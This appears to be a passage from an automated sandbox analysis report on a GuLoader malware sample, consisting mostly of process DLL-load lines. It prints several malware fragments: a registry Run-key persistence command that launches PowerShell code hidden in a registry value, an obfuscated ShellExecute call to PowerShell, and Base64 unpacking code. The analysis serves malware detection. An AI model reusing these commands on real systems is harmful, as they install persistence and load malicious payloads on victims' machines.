Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%gam% -w 1 $Putrilaginously=(Get-ItemProperty -Path 'HKCU:\predetrimental\').Bingoer;%gam% ($Putrilaginously)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%gam% -w 1 $Putrilaginously=(Get-ItemProperty -Path 'HKCU:\predetrimental\').Bingoer;%gam% ($Putrilaginously)"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptdlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptdlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Section loaded: iertutil.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2003573234.00000000008A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2010781616.0000000006F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2010781616.0000000006F85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbGCTL source: FTSKIaM.exe, 00000013.00000000.2378354849.0000000000A11000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.2003573234.0000000000904000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdbS source: powershell.exe, 00000009.00000002.2010781616.0000000006F85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdb source: FTSKIaM.exe, FTSKIaM.exe, 00000013.00000000.2378354849.0000000000A11000.00000020.00000001.01000000.00000008.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: ShellExecute("POWERSHELL.exe", ""$Overburdeningly = 1;$Haarrddernes='Su", "", "", "0");

Yara detected GuLoader

Source: Yara match	File source: 00000009.00000002.2016300220.000000000951A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2679929733.000000000438A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2007966903.0000000005714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2016128016.0000000008250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2224520722.000001F09AC40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Tavlemesters)$global:Ambulatorierne = [System.Text.Encoding]::ASCII.GetString($Hjemvisning)$global:Reddedes=$Ambulatorierne.substring(290804,28156)<#Cachexias Mumiernes Kommaregler #
